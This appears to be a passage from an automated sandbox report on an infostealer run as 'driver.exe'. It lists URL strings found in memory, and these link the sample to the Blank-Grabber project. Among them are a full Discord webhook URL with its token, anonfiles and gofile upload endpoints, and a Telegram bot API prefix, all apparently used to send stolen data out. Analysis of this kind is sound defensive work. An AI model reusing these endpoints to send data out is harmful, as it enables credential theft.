              Source: powershell.exe, 0000000E.00000002.2214718488.000001A9B5E0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002F.00000002.2261891481.0000028F81653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: driver.exe, 00000000.00000003.2058474705.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2058564127.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2057639967.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: driver.exe, 00000002.00000002.2438981271.000001C0EDCB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: powershell.exe, 0000002F.00000002.2315796197.0000028FF5F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: driver.exe, 00000002.00000002.2445265789.000001C0EF73C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000E.00000002.2214718488.000001A9B5BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr#
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~r
              Source: driver.exe, 00000002.00000003.2184794843.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1326920011201118251/xRN_dhCbCT8HeZRae0xJk1yw1sh06GaK4mq7ylVag5fFfCb
              Source: driver.exe, 00000002.00000003.2184794843.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: driver.exe, 00000002.00000002.2439345292.000001C0EDD90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: svchost.exe, 00000030.00000003.2157180555.000002106B873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000030.00000003.2157180555.000002106B800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: driver.exe, 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr#
              Source: driver.exe, 00000002.00000003.2075105413.000001C0EE390000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075481940.000001C0EE09C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075373068.000001C0EE044000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075977793.000001C0EE0A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2079997123.000001C0EE0D4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2078386891.000001C0EE0E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
              Source: driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
              Source: powershell.exe, 0000002F.00000002.2261891481.0000028F80ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: driver.exe, 00000002.00000003.2190639950.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434655198.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2440748716.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149413068.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2187487216.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: driver.exe, 00000002.00000002.2439933972.000001C0EE1DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434655198.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2440748716.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149413068.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2187487216.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: driver.exe, 00000002.00000003.2080866630.000001C0EDCAF000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2079393233.000001C0EDA2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: driver.exe, 00000002.00000002.2445265789.000001C0EF758000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: driver.exe, 00000002.00000002.2445265789.000001C0EF73C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000E.00000002.2243088797.000001A9C5C53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F8196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000002F.00000002.2261891481.0000028F81653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000002F.00000002.2261891481.0000028F81653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
              Source: driver.exe, 00000002.00000003.2149672861.000001C0EE151000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
              Source: driver.exe, 00000002.00000003.2149672861.000001C0EE151000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
              Source: driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: driver.exe, 00000002.00000003.2065257439.000001C0ED951000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: driver.exe, 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: driver.exe, 00000002.00000003.2186287198.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441499292.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335260534.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2115178602.000001C0EED48000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: driver.exe, 00000002.00000003.2335617765.000001C0EE35D000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2191367596.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
              Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: driver.exe, 00000002.00000003.2079997123.000001C0EE114000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: driver.exe, 00000002.00000003.2190639950.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434655198.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2440748716.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149413068.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2187487216.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: driver.exe, 00000002.00000003.2186287198.000001C0EE2A4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
